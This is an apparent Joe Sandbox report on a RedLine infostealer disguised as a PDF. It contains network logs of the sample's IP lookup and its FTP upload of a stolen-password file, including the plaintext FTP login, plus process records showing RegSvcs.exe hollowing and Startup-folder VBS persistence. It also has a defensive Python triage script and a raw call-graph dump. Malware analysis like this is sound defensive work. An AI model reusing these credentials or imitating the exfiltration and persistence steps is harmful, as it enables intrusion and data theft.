| 0 | 192.168.2.6 | 49712 | 104.26.12.205 | 443 | 6704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp / Bytes transferred / Direction / Data:

2024-09-26 03:34:09 UTC, 155 bytes, OUT:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive

2024-09-26 03:34:09 UTC, 211 bytes, IN:
HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 03:34:09 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c90325518704387-EWR

2024-09-26 03:34:09 UTC, 11 bytes, IN:
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49718 | 104.26.12.205 | 443 | 6828 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp / Bytes transferred / Direction / Data:

2024-09-26 03:34:30 UTC, 155 bytes, OUT:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive

2024-09-26 03:34:30 UTC, 211 bytes, IN:
HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 03:34:30 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8c9032d808ec4349-EWR

2024-09-26 03:34:30 UTC, 11 bytes, IN:
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
Data Ascii: 8.46.123.33


| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
|---|---|---|---|---|---|
| Sep 26, 2024 05:34:31.562532902 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- |
| | | | | | 220-You are user number 2 of 150 allowed. |
| | | | | | 220-Local time is now 22:34. Server port: 21. |
| | | | | | 220-IPv6 connections are also welcome on this server. |
| | | | | | 220 You will be disconnected after 15 minutes of inactivity. |
| Sep 26, 2024 05:34:31.566306114 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | USER belogs@beirutrest.com |
| Sep 26, 2024 05:34:31.816140890 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 331 User belogs@beirutrest.com OK. Password required |
| Sep 26, 2024 05:34:31.818332911 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | PASS 9yXQ39wz(uL+ |
| Sep 26, 2024 05:34:32.135926962 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 230 OK. Current restricted directory is / |
| Sep 26, 2024 05:34:32.305547953 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 504 Unknown command |
| Sep 26, 2024 05:34:32.305730104 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | PWD |
| Sep 26, 2024 05:34:32.464019060 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 257 "/" is your current location |
| Sep 26, 2024 05:34:32.464160919 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | TYPE I |
| Sep 26, 2024 05:34:32.623011112 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 200 TYPE is now 8-bit binary |
| Sep 26, 2024 05:34:32.624847889 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | PASV |
| Sep 26, 2024 05:34:32.796765089 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 227 Entering Passive Mode (50,87,144,157,137,212) |
| Sep 26, 2024 05:34:32.803494930 CEST | 49719 | 21 | 192.168.2.6 | 50.87.144.157 | STOR PW_user-123716_2024_09_25_23_34_30.html |
| Sep 26, 2024 05:34:33.314507961 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 150 Accepted data connection |
| Sep 26, 2024 05:34:33.483603954 CEST | 21 | 49719 | 50.87.144.157 | 192.168.2.6 | 226-File successfully transferred |
| | | | | | 226 0.171 seconds (measured here), 1.99 Kbytes per second |

Target ID: 0
Start time: 23:33:58
Start date: 25/09/2024
Path: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
Imagebase: 0x400000
File size: 1'285'979 bytes
MD5 hash: 6F780B2D3C14A3C9BB7C99C818421EA1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 23:34:03
Start date: 25/09/2024
Path: C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
Imagebase: 0x400000
File size: 1'285'979 bytes
MD5 hash: 6F780B2D3C14A3C9BB7C99C818421EA1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2229607380.0000000002B70000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 34%, ReversingLabs
Reputation: low
Has exited: true

Target ID: 3
Start time: 23:34:07
Start date: 25/09/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
Imagebase: 0x780000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 23:34:15
Start date: 25/09/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase: 0x7ff63a0d0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 23:34:16
Start date: 25/09/2024
Path: C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\directory\name.exe"
Imagebase: 0x400000
File size: 1'285'979 bytes
MD5 hash: 6F780B2D3C14A3C9BB7C99C818421EA1
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2366519068.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

                            Target ID:7
                            Start time:23:34:20
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x2a0000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:23:34:20
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.2403356452.0000000001690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:23:34:24
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:23:34:24
                            Start date:25/09/2024
                            Path:C:\Users\user\AppData\Local\directory\name.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0x400000
                            File size:1'285'979 bytes
                            MD5 hash:6F780B2D3C14A3C9BB7C99C818421EA1
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:11
                            Start time:23:34:28
                            Start date:25/09/2024
                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
                            Imagebase:0xac0000
                            File size:45'984 bytes
                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

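The process list above carries the three behaviours that matter for triage: RegSvcs.exe (Target IDs 3, 7, 9, 11) runs with the command line of a different image, which is the footprint of the process hollowing the report flags; the launched name is a double extension (`.pdf.exe`); and wscript.exe (Target ID 5) executes a `.vbs` from the per-user Startup folder. The script below, an added example that is not part of this Joe Sandbox report and not Joe Security's code, parses records in the report's own `Key:Value` layout and applies those checks. Its sample input is constructed from the Target ID 3, 5 and 6 entries (abridged to the fields the checks need); the decoy-extension list, the regular expressions and the finding labels are the example's own assumptions.

```python
"""Triage checks over the report's flattened process list.

Added example; not code from the Joe Sandbox report or from Joe Security.
The records below are constructed from the Target ID 3, 5 and 6 entries
above (abridged to the fields the checks need); the decoy-extension list,
the regexes and the finding labels are this example's own assumptions.
"""
import re
from typing import Dict, List

# Constructed sample input: three of the report's process records, with the
# report's field labels, blank-line separated exactly as the page lays them out.
SAMPLE_RECORDS = r"""
Target ID:3
Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Commandline:"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"

Target ID:5
Path:C:\Windows\System32\wscript.exe
Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Target ID:6
Path:C:\Users\user\AppData\Local\directory\name.exe
Commandline:"C:\Users\user\AppData\Local\directory\name.exe"
"""

# Assumed list of "document-looking" extensions placed in front of .exe.
DECOY_EXTS = ("pdf", "doc", "docx", "xls", "xlsx", "ppt", "jpg", "png", "txt")
DOUBLE_EXT = re.compile(r"\.(?:%s)\.exe$" % "|".join(DECOY_EXTS), re.IGNORECASE)
# Script files launched out of the per-user Startup folder.
STARTUP_SCRIPT = re.compile(
    r"\\Start Menu\\Programs\\Startup\\[^\"\\]+\.(?:vbs|vbe|js|jse|wsf)\b",
    re.IGNORECASE,
)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def parse_records(text: str) -> List[Dict[str, str]]:
    """Split the 'Key:Value' process list into one dict per process.

    Only the first ':' separates key from value, so 'Path:C:\\...' keeps
    its drive letter and 'Start time:23:34:07' keeps its colons.
    """
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, sep, value = line.strip().partition(":")
            if sep:
                rec[key] = value
        if rec:
            records.append(rec)
    return records


def exe_from_commandline(cmdline: str) -> str:
    """Return the image a command line names: its first token, quotes stripped."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def basename(path: str) -> str:
    """Case-folded final path component (Windows separators)."""
    return path.rsplit("\\", 1)[-1].lower()


def flag_process(rec: Dict[str, str]) -> List[str]:
    """Return the triage findings for one process record (empty if clean)."""
    findings = []
    path = rec.get("Path", "")
    cmdline = rec.get("Commandline", "")
    cmd_exe = exe_from_commandline(cmdline)
    # A process whose command line names a different image than the one
    # actually mapped is the classic footprint of process hollowing
    # (here: RegSvcs.exe carrying the dropper's command line).
    if cmd_exe and basename(cmd_exe) != basename(path):
        findings.append("image/commandline mismatch (hollowing indicator)")
    if DOUBLE_EXT.search(basename(cmd_exe)):
        findings.append("double extension on launched executable")
    if basename(path) in SCRIPT_HOSTS and STARTUP_SCRIPT.search(cmdline):
        findings.append("script host running a file from the Startup folder")
    return findings


def triage(text: str) -> Dict[str, List[str]]:
    """Map Target ID -> findings for every record that triggers a check."""
    results = {}
    for rec in parse_records(text):
        hits = flag_process(rec)
        if hits:
            results[rec.get("Target ID", "?")] = hits
    return results


if __name__ == "__main__":
    for target, hits in triage(SAMPLE_RECORDS).items():
        print(f"Target ID {target}: " + "; ".join(hits))
```

Run against the constructed records it reports Target ID 3 twice (hollowing indicator and double extension) and Target ID 5 once (Startup-folder script); Target ID 6 is clean because its image and command line agree. The same two fields exist as `Image` and `CommandLine` in Sysmon Event ID 1, so the mismatch check transfers directly to endpoint telemetry; note that a legitimate 32-bit RegSvcs.exe launch would never carry a Desktop-path `.exe` as its command line.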
                              Execution Graph

                              Execution Coverage:3.2%
                              Dynamic/Decrypted Code Coverage:0.5%
                              Signature Coverage:9.6%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:35
execution_graph: [interactive call-graph node/edge list not reproduced; the page's copy of it is also cut off mid-list. The node labels reference the following Windows API calls, grouped by area:
• Tray icon, window and message loop: Shell_NotifyIconW, DestroyIcon, RegisterClassExW, CreateWindowExW, ShowWindow, DefWindowProcW, GetMessageW, PeekMessageW, TranslateMessage, DispatchMessageW, PostQuitMessage, CreatePopupMenu, SetTimer, KillTimer, RegisterWindowMessageW, LockWindowUpdate, DestroyWindow, GetForegroundWindow, MessageBoxA, LoadStringW, LoadImageW, LoadIconW, LoadCursorW, GetSysColorBrush, EnumResourceNamesW, SystemParametersInfoW
• Registry, file system and process control: RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleFileNameW, GetFullPathNameW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetOpenFileNameW, SHGetMalloc, ShellExecuteW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, LoadLibraryA, GetProcAddress
• Anti-debug and fault handling: IsDebuggerPresent (reached both from application code at 40d5b6, followed by MessageBoxA, and from the CRT's __call_reportfault path), SetUnhandledExceptionFilter, UnhandledExceptionFilter, RaiseException, GetCurrentProcess, TerminateProcess
• CRT startup, heap and timing: HeapCreate, HeapAlloc, RtlAllocateHeap, RtlFreeHeap, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, LeaveCriticalSection, GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStdHandle, GetFileType, SetHandleCount, GetSystemTimeAsFileTime, timeGetTime, Sleep, WideCharToMultiByte, VariantClear, GetLastError, ExitProcess]
__wopenfile 87142->87154 87175 417f77 46 API calls __getptd_noexit 87143->87175 87145 41d25a 87176 417f25 10 API calls __tsopen_nolock 87145->87176 87147 41d47a 87180 417f77 46 API calls __getptd_noexit 87147->87180 87148 41d48c 87172 422bf9 87148->87172 87151 41499d 87165 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87151->87165 87152 41d47f 87181 417f25 10 API calls __tsopen_nolock 87152->87181 87154->87147 87154->87154 87160 41d421 87154->87160 87177 41341f 58 API calls 2 library calls 87154->87177 87156 41d41a 87156->87160 87178 41341f 58 API calls 2 library calls 87156->87178 87158 41d439 87158->87160 87179 41341f 58 API calls 2 library calls 87158->87179 87160->87147 87160->87148 87161->87109 87162->87121 87163->87121 87164->87121 87165->87121 87171 4181f2 LeaveCriticalSection 87166->87171 87168 41d602 87168->87132 87169->87139 87170->87139 87171->87168 87182 422b35 87172->87182 87174 422c14 87174->87151 87175->87145 87176->87151 87177->87156 87178->87158 87179->87160 87180->87152 87181->87151 87184 422b41 __tsopen_nolock 87182->87184 87183 422b54 87185 417f77 __tsopen_nolock 46 API calls 87183->87185 87184->87183 87186 422b8a 87184->87186 87187 422b59 87185->87187 87189 422400 __tsopen_nolock 109 API calls 87186->87189 87188 417f25 __tsopen_nolock 10 API calls 87187->87188 87192 422b63 __tsopen_nolock 87188->87192 87190 422ba4 87189->87190 87191 422bcb __wsopen_helper LeaveCriticalSection 87190->87191 87191->87192 87192->87174 87194 4150dd __tsopen_nolock 87193->87194 87195 4150e9 87194->87195 87196 41510f 87194->87196 87224 417f77 46 API calls __getptd_noexit 87195->87224 87206 415471 87196->87206 87199 4150ee 87225 417f25 10 API calls __tsopen_nolock 87199->87225 87205 4150f9 __tsopen_nolock 87205->87050 87207 415483 87206->87207 87208 4154a5 EnterCriticalSection 87206->87208 87207->87208 87209 41548b 87207->87209 87210 415117 87208->87210 87211 4182cb __lock 46 API calls 87209->87211 87212 415047 87210->87212 87211->87210 87213 415067 
87212->87213 87214 415057 87212->87214 87219 415079 87213->87219 87227 414e4e 87213->87227 87282 417f77 46 API calls __getptd_noexit 87214->87282 87218 41505c 87226 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87218->87226 87244 41443c 87219->87244 87222 4150b9 87257 41e1f4 87222->87257 87224->87199 87225->87205 87226->87205 87228 414e61 87227->87228 87229 414e79 87227->87229 87283 417f77 46 API calls __getptd_noexit 87228->87283 87231 414139 __flush 46 API calls 87229->87231 87233 414e80 87231->87233 87232 414e66 87284 417f25 10 API calls __tsopen_nolock 87232->87284 87235 41e1f4 __write 51 API calls 87233->87235 87236 414e97 87235->87236 87237 414f09 87236->87237 87239 414ec9 87236->87239 87243 414e71 87236->87243 87285 417f77 46 API calls __getptd_noexit 87237->87285 87240 41e1f4 __write 51 API calls 87239->87240 87239->87243 87241 414f64 87240->87241 87242 41e1f4 __write 51 API calls 87241->87242 87241->87243 87242->87243 87243->87219 87245 414477 87244->87245 87246 414455 87244->87246 87250 414139 87245->87250 87246->87245 87247 414139 __flush 46 API calls 87246->87247 87248 414470 87247->87248 87286 41b7b2 77 API calls 4 library calls 87248->87286 87251 414145 87250->87251 87252 41415a 87250->87252 87287 417f77 46 API calls __getptd_noexit 87251->87287 87252->87222 87254 41414a 87288 417f25 10 API calls __tsopen_nolock 87254->87288 87256 414155 87256->87222 87258 41e200 __tsopen_nolock 87257->87258 87259 41e223 87258->87259 87260 41e208 87258->87260 87261 41e22f 87259->87261 87267 41e269 87259->87267 87309 417f8a 46 API calls __getptd_noexit 87260->87309 87311 417f8a 46 API calls __getptd_noexit 87261->87311 87264 41e20d 87310 417f77 46 API calls __getptd_noexit 87264->87310 87266 41e234 87312 417f77 46 API calls __getptd_noexit 87266->87312 87289 41ae56 87267->87289 87270 41e23c 87313 417f25 10 API calls __tsopen_nolock 87270->87313 87271 41e26f 87272 41e291 87271->87272 87273 41e27d 87271->87273 87314 417f77 46 API calls __getptd_noexit 
87272->87314 87299 41e17f 87273->87299 87277 41e215 __tsopen_nolock 87277->87218 87278 41e289 87316 41e2c0 LeaveCriticalSection __unlock_fhandle 87278->87316 87279 41e296 87315 417f8a 46 API calls __getptd_noexit 87279->87315 87282->87218 87283->87232 87284->87243 87285->87243 87286->87245 87287->87254 87288->87256 87290 41ae62 __tsopen_nolock 87289->87290 87291 41aebc 87290->87291 87292 4182cb __lock 46 API calls 87290->87292 87293 41aec1 EnterCriticalSection 87291->87293 87294 41aede __tsopen_nolock 87291->87294 87295 41ae8e 87292->87295 87293->87294 87294->87271 87296 41aeaa 87295->87296 87297 41ae97 InitializeCriticalSectionAndSpinCount 87295->87297 87298 41aeec ___lock_fhandle LeaveCriticalSection 87296->87298 87297->87296 87298->87291 87300 41aded __commit 46 API calls 87299->87300 87301 41e18e 87300->87301 87302 41e1a4 SetFilePointer 87301->87302 87303 41e194 87301->87303 87304 41e1bb GetLastError 87302->87304 87306 41e1c3 87302->87306 87305 417f77 __tsopen_nolock 46 API calls 87303->87305 87304->87306 87307 41e199 87305->87307 87306->87307 87308 417f9d __dosmaperr 46 API calls 87306->87308 87307->87278 87308->87307 87309->87264 87310->87277 87311->87266 87312->87270 87313->87277 87314->87279 87315->87278 87316->87277 87318 4149ea 87317->87318 87319 4149fe 87317->87319 87363 417f77 46 API calls __getptd_noexit 87318->87363 87321 4149fa 87319->87321 87323 41443c __flush 77 API calls 87319->87323 87335 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87321->87335 87322 4149ef 87364 417f25 10 API calls __tsopen_nolock 87322->87364 87325 414a0a 87323->87325 87336 41d8c2 87325->87336 87328 414139 __flush 46 API calls 87329 414a18 87328->87329 87340 41d7fe 87329->87340 87331 414a1e 87331->87321 87332 413748 _free 46 API calls 87331->87332 87332->87321 87333->87063 87334->87066 87335->87066 87337 414a12 87336->87337 87338 41d8d2 87336->87338 87337->87328 87338->87337 87339 413748 _free 46 API calls 87338->87339 87339->87337 87341 41d80a __tsopen_nolock 
87340->87341 87342 41d812 87341->87342 87343 41d82d 87341->87343 87380 417f8a 46 API calls __getptd_noexit 87342->87380 87345 41d839 87343->87345 87348 41d873 87343->87348 87382 417f8a 46 API calls __getptd_noexit 87345->87382 87346 41d817 87381 417f77 46 API calls __getptd_noexit 87346->87381 87351 41ae56 ___lock_fhandle 48 API calls 87348->87351 87350 41d83e 87383 417f77 46 API calls __getptd_noexit 87350->87383 87354 41d879 87351->87354 87352 41d81f __tsopen_nolock 87352->87331 87357 41d893 87354->87357 87358 41d887 87354->87358 87355 41d846 87384 417f25 10 API calls __tsopen_nolock 87355->87384 87385 417f77 46 API calls __getptd_noexit 87357->87385 87365 41d762 87358->87365 87361 41d88d 87386 41d8ba LeaveCriticalSection __unlock_fhandle 87361->87386 87363->87322 87364->87321 87387 41aded 87365->87387 87367 41d7c8 87400 41ad67 47 API calls __tsopen_nolock 87367->87400 87369 41d772 87369->87367 87371 41aded __commit 46 API calls 87369->87371 87379 41d7a6 87369->87379 87370 41aded __commit 46 API calls 87372 41d7b2 CloseHandle 87370->87372 87375 41d79d 87371->87375 87372->87367 87377 41d7be GetLastError 87372->87377 87373 41d7f2 87373->87361 87374 41d7d0 87374->87373 87401 417f9d 46 API calls 2 library calls 87374->87401 87376 41aded __commit 46 API calls 87375->87376 87376->87379 87377->87367 87379->87367 87379->87370 87380->87346 87381->87352 87382->87350 87383->87355 87384->87352 87385->87361 87386->87352 87388 41ae12 87387->87388 87389 41adfa 87387->87389 87391 417f8a __tsopen_nolock 46 API calls 87388->87391 87394 41ae51 87388->87394 87390 417f8a __tsopen_nolock 46 API calls 87389->87390 87392 41adff 87390->87392 87393 41ae23 87391->87393 87395 417f77 __tsopen_nolock 46 API calls 87392->87395 87396 417f77 __tsopen_nolock 46 API calls 87393->87396 87394->87369 87399 41ae07 87395->87399 87397 41ae2b 87396->87397 87398 417f25 __tsopen_nolock 10 API calls 87397->87398 87398->87399 87399->87369 87400->87374 87401->87373 87403 414c82 __tsopen_nolock 87402->87403 
87404 414cc3 87403->87404 87405 414c96 __recalloc 87403->87405 87406 414cbb __tsopen_nolock 87403->87406 87407 415471 __lock_file 47 API calls 87404->87407 87429 417f77 46 API calls __getptd_noexit 87405->87429 87406->87073 87408 414ccb 87407->87408 87415 414aba 87408->87415 87411 414cb0 87430 417f25 10 API calls __tsopen_nolock 87411->87430 87419 414ad8 __recalloc 87415->87419 87421 414af2 87415->87421 87416 414ae2 87482 417f77 46 API calls __getptd_noexit 87416->87482 87418 414ae7 87483 417f25 10 API calls __tsopen_nolock 87418->87483 87419->87416 87419->87421 87426 414b2d 87419->87426 87431 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 87421->87431 87423 414c38 __recalloc 87485 417f77 46 API calls __getptd_noexit 87423->87485 87424 414139 __flush 46 API calls 87424->87426 87426->87421 87426->87423 87426->87424 87432 41dfcc 87426->87432 87462 41d8f3 87426->87462 87484 41e0c2 46 API calls 3 library calls 87426->87484 87429->87411 87430->87406 87431->87406 87433 41dfd8 __tsopen_nolock 87432->87433 87434 41dfe0 87433->87434 87435 41dffb 87433->87435 87555 417f8a 46 API calls __getptd_noexit 87434->87555 87436 41e007 87435->87436 87441 41e041 87435->87441 87557 417f8a 46 API calls __getptd_noexit 87436->87557 87439 41dfe5 87556 417f77 46 API calls __getptd_noexit 87439->87556 87440 41e00c 87558 417f77 46 API calls __getptd_noexit 87440->87558 87444 41e063 87441->87444 87445 41e04e 87441->87445 87446 41ae56 ___lock_fhandle 48 API calls 87444->87446 87560 417f8a 46 API calls __getptd_noexit 87445->87560 87449 41e069 87446->87449 87447 41e014 87559 417f25 10 API calls __tsopen_nolock 87447->87559 87451 41e077 87449->87451 87452 41e08b 87449->87452 87450 41e053 87561 417f77 46 API calls __getptd_noexit 87450->87561 87486 41da15 87451->87486 87562 417f77 46 API calls __getptd_noexit 87452->87562 87455 41dfed __tsopen_nolock 87455->87426 87458 41e083 87564 41e0ba LeaveCriticalSection __unlock_fhandle 87458->87564 87459 41e090 87563 417f8a 46 API calls 
__getptd_noexit 87459->87563 87463 41d900 87462->87463 87467 41d915 87462->87467 87568 417f77 46 API calls __getptd_noexit 87463->87568 87465 41d905 87569 417f25 10 API calls __tsopen_nolock 87465->87569 87468 41d94a 87467->87468 87473 41d910 87467->87473 87565 420603 87467->87565 87470 414139 __flush 46 API calls 87468->87470 87471 41d95e 87470->87471 87472 41dfcc __read 59 API calls 87471->87472 87474 41d965 87472->87474 87473->87426 87474->87473 87475 414139 __flush 46 API calls 87474->87475 87476 41d988 87475->87476 87476->87473 87477 414139 __flush 46 API calls 87476->87477 87478 41d994 87477->87478 87478->87473 87479 414139 __flush 46 API calls 87478->87479 87480 41d9a1 87479->87480 87481 414139 __flush 46 API calls 87480->87481 87481->87473 87482->87418 87483->87421 87484->87426 87485->87418 87487 41da31 87486->87487 87488 41da4c 87486->87488 87489 417f8a __tsopen_nolock 46 API calls 87487->87489 87490 41da5b 87488->87490 87492 41da7a 87488->87492 87491 41da36 87489->87491 87493 417f8a __tsopen_nolock 46 API calls 87490->87493 87495 417f77 __tsopen_nolock 46 API calls 87491->87495 87494 41da98 87492->87494 87508 41daac 87492->87508 87496 41da60 87493->87496 87497 417f8a __tsopen_nolock 46 API calls 87494->87497 87509 41da3e 87495->87509 87499 417f77 __tsopen_nolock 46 API calls 87496->87499 87501 41da9d 87497->87501 87498 41db02 87500 417f8a __tsopen_nolock 46 API calls 87498->87500 87502 41da67 87499->87502 87503 41db07 87500->87503 87504 417f77 __tsopen_nolock 46 API calls 87501->87504 87505 417f25 __tsopen_nolock 10 API calls 87502->87505 87506 417f77 __tsopen_nolock 46 API calls 87503->87506 87507 41daa4 87504->87507 87505->87509 87506->87507 87512 417f25 __tsopen_nolock 10 API calls 87507->87512 87508->87498 87508->87509 87510 41dae1 87508->87510 87511 41db1b 87508->87511 87509->87458 87510->87498 87513 41daec ReadFile 87510->87513 87515 416b04 __malloc_crt 46 API calls 87511->87515 87512->87509 87516 41dc17 87513->87516 87517 41df8f GetLastError 
87513->87517 87518 41db31 87515->87518 87516->87517 87523 41dc2b 87516->87523 87519 41de16 87517->87519 87520 41df9c 87517->87520 87521 41db59 87518->87521 87522 41db3b 87518->87522 87529 417f9d __dosmaperr 46 API calls 87519->87529 87534 41dd9b 87519->87534 87525 417f77 __tsopen_nolock 46 API calls 87520->87525 87524 420494 __lseeki64_nolock 48 API calls 87521->87524 87526 417f77 __tsopen_nolock 46 API calls 87522->87526 87523->87534 87540 41dc47 87523->87540 87541 41de5b 87523->87541 87527 41db67 87524->87527 87528 41dfa1 87525->87528 87530 41db40 87526->87530 87527->87513 87532 417f8a __tsopen_nolock 46 API calls 87528->87532 87529->87534 87531 417f8a __tsopen_nolock 46 API calls 87530->87531 87531->87509 87532->87534 87533 413748 _free 46 API calls 87533->87509 87534->87509 87534->87533 87535 41ded0 ReadFile 87538 41deef GetLastError 87535->87538 87547 41def9 87535->87547 87536 41dcab ReadFile 87537 41dcc9 GetLastError 87536->87537 87546 41dcd3 87536->87546 87537->87540 87537->87546 87538->87541 87538->87547 87539 41ddec MultiByteToWideChar 87539->87534 87542 41de10 GetLastError 87539->87542 87540->87536 87543 41dd28 87540->87543 87541->87534 87541->87535 87542->87519 87543->87534 87544 41dda3 87543->87544 87545 41dd96 87543->87545 87549 41dd60 87543->87549 87544->87549 87550 41ddda 87544->87550 87548 417f77 __tsopen_nolock 46 API calls 87545->87548 87546->87540 87551 420494 __lseeki64_nolock 48 API calls 87546->87551 87547->87541 87552 420494 __lseeki64_nolock 48 API calls 87547->87552 87548->87534 87549->87539 87553 420494 __lseeki64_nolock 48 API calls 87550->87553 87551->87546 87552->87547 87554 41dde9 87553->87554 87554->87539 87555->87439 87556->87455 87557->87440 87558->87447 87559->87455 87560->87450 87561->87447 87562->87459 87563->87458 87564->87455 87566 416b04 __malloc_crt 46 API calls 87565->87566 87567 420618 87566->87567 87567->87468 87568->87465 87569->87473 87573 4148b3 GetSystemTimeAsFileTime __aulldiv 87570->87573 87572 442c6b 87572->87076 
